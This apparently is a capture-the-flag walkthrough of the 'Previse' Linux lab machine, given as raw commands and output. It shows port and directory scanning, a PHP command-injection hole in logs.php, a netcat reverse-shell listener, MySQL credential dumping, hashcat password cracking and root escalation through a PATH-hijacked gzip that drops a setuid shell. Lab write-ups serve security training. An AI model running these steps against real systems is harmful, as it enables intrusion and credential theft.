Previse
#easy #linux
Last updated
#easy #linux
Last updated
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63echo -n "$(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" | xclip -sel clipnmap -p 22,80 -sCV -Pn -n -vv 10.129.61.25 -oA openPortsServicesVersionPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbdbnxQupSPdfuEywpVV7Wp3dHqctX3U+bBa/UyMNxMjkPO+rL5E6ZTAcnoaOJ7SK8Mx1xWik7t78Q0e16QHaz3vk2AgtklyB+KtlH4RWMBEaZVEAfqXRG43FrvYgZe7WitZINAo6kegUbBZVxbCIcUM779/q+i+gXtBJiEdOOfZCaUtB0m6MlwE2H2SeID06g3DC54/VSvwHigQgQ1b7CNgQOslbQ78FbhI+k9kT2gYslacuTwQhacntIh2XFo0YtfY+dySOmi3CXFrNlbUc2puFqtlvBm3TxjzRTxAImBdspggrqXHoOPYf2DBQUMslV9prdyI6kfz9jUFu2P1Dd
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnDbkb4wzeF+aiHLOs5KNLPZhGOzgPwRSQ3VHK7vi4rH60g/RsecRusTkpq48Pln1iTYQt/turjw3lb0SfEK/4=
| 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelffuf -u http://10.129.61.25/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php -t 80 -c -icindex.php [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 242ms]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54, Duration: 244ms]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113, Duration: 291ms]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 2733ms]
.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3733ms]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21, Duration: 228ms]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32, Duration: 234ms]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6, Duration: 226ms]
css [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 232ms]
status.php [Status: 302, Size: 2966, Words: 749, Lines: 75, Duration: 251ms]
js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 229ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 228ms]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94, Duration: 231ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 235ms]
logs.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 229ms]
.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 234ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 234ms]mkdir site
unzip siteBackup.zip -d site
Archive: siteBackup.zip
inflating: site/accounts.php
inflating: site/config.php
inflating: site/download.php
inflating: site/file_logs.php
inflating: site/files.php
inflating: site/footer.php
inflating: site/header.php
inflating: site/index.php
inflating: site/login.php
inflating: site/logout.php
inflating: site/logs.php
inflating: site/nav.php
inflating: site/status.php cd site
cat logs.php<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>
<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
$filepath = "/var/www/out.log";
$filename = "out.log";
if(file_exists($filepath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
ob_clean(); // Discard data in the output buffer
flush(); // Flush system headers
readfile($filepath);
die();
} else {
http_response_code(404);
die();
}
?>nc -lnvp 1111nc -lvnp 1111
Connection from 10.129.95.185:45462
bash: cannot set terminal process group (1719): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ www-data@previse:/var/www/html$ ls
ls
accounts.php
android-chrome-192x192.png
android-chrome-512x512.png
apple-touch-icon.png
config.php
css
download.php
favicon-16x16.png
favicon-32x32.png
favicon.ico
file_logs.php
files.php
footer.php
header.php
index.php
js
login.php
logout.php
logs.php
nav.php
site.webmanifest
status.php
typescript
www-data@previse:/var/www/html$ cat config.php
cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>www-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'show databases;'
< -u root -p'mySQL_p@ssw0rd!:)' -e 'show databases;'
mysql: [Warning] Using a password on the command line interface can be insecure.
Database
information_schema
mysql
performance_schema
previse
syswww-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'show tables;'
<oot -p'mySQL_p@ssw0rd!:)' previse -e 'show tables;'
mysql: [Warning] Using a password on the command line interface can be insecure.
Tables_in_previse
accounts
fileswww-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'select * from accounts;'
<L_p@ssw0rd!:)' previse -e 'select * from accounts;'
mysql: [Warning] Using a password on the command line interface can be insecure.
id username password created_at
1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36
2 testuser $1$🧂llol$DJ6ZVzF0zBGjTIV/GTvOf/ 2025-10-19 23:27:26www-data@previse:/var/www/html$ cat accounts.php
cat accounts.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
}
?>
<?php include( 'header.php' ); ?>
<title>Previse Create Account</title>
</head>
<body>
<?php include( 'nav.php' ); ?>
<section class="uk-section uk-section-default">
<div class="uk-container">
<h2 class="uk-heading-divider">Add New Account</h2>
<p>Create new user.</p>
<p class="uk-alert-danger">ONLY ADMINS SHOULD BE ABLE TO ACCESS THIS PAGE!!</p>
<p>Usernames and passwords must be between 5 and 32 characters!</p>
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
if (empty(trim($_POST['username']))) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>The username needs to be provided!</p></div>';
} elseif (empty(trim($_POST['password']))) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>The password needs to be provided!</p></div>';
} elseif (empty(trim($_POST['confirm']))) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>The password confirmation needs to be provided!</p></div>';
} else {
if (!preg_match('/^[a-zA-Z0-9_]+$/', trim($_POST['username']))) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>Usernames can only contain letters, numbers, and underscores!</p></div>';
} else {
$username = filter_var($_POST['username'], FILTER_SANITIZE_STRING);
$password = $_POST['password'];
$confirm = filter_var($_POST['confirm'], FILTER_SANITIZE_STRING);
if (strlen($username) > 32 || strlen($username) < 5) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>Username must be 5 to 32 chars!</p></div>';
} else {
$db = connectDB();
if ($db === false) {
die("ERROR: Could not connect. " . $db->connect_error);
}
$sql = "SELECT username FROM accounts WHERE username = '{$username}' limit 1;";
$accountResult = $db->query($sql);
if ($accountResult->num_rows != 0) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>Username is already taken!</p></div>';
$accountResult->free();
} else {
$accountResult->free();
if (strlen($password) > 32 || strlen($password) < 5) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>Password must be between 5 and 32 chars!</p></div>';
} else {
if ($password != $confirm) {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>The passwords dont match!</p></div>';
} else {
$hash = crypt($password, '$1$🧂llol$');
$db = connectDB();
if ($db === false) {
die("ERROR: Could not connect. " . $db->connect_error);
}
$sql = "INSERT INTO accounts (username, password) VALUES ('{$username}','{$hash}')";
$result = $db->query($sql);
if ($result) {
echo '<div class="uk-alert-success" uk-alert><a class="uk-alert-close" uk-close></a><p>Success! User was added!</p></div>';
} else {
echo '<div class="uk-alert-danger" uk-alert><a class="uk-alert-close" uk-close></a><p>Error! Failed to add new user</p></div>';
}
$db->close();
}
}
}
}
}
}
}
?></p>
<form role="form" method="post" action="accounts.php">
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: user"></span>
<input type="text" name="username" class="uk-input" id="username" placeholder="Username">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="password" class="uk-input" id="password" placeholder="Password">
</div>
</div>
<div class="uk-margin">
<div class="uk-inline">
<span class="uk-form-icon" uk-icon="icon: lock"></span>
<input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
</div>
</div>
<button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>
</div>
</section>
<?php include( 'footer.php' ); ?>echo '$1$llol$DQpmdvnb7EeuO6UaqRItf.' > hash.txthashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!Username: m4lwhere
Password: ilovecody112235!ssh m4lwhere@10.129.95.185
m4lwhere@previse:~$ ls
user.txt
m4lwhere@previse:~$ cat user.txtm4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.shm4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gzm4lwhere@previse:~$ cd /tmp
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
m4lwhere@previse:/tmp$ ls -la /tmp/bash
-rwsr-xr-x 1 root root 1113504 Oct 20 00:47 /tmp/bash
m4lwhere@previse:/tmp$ /tmp/bash -p
bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# cat root.txt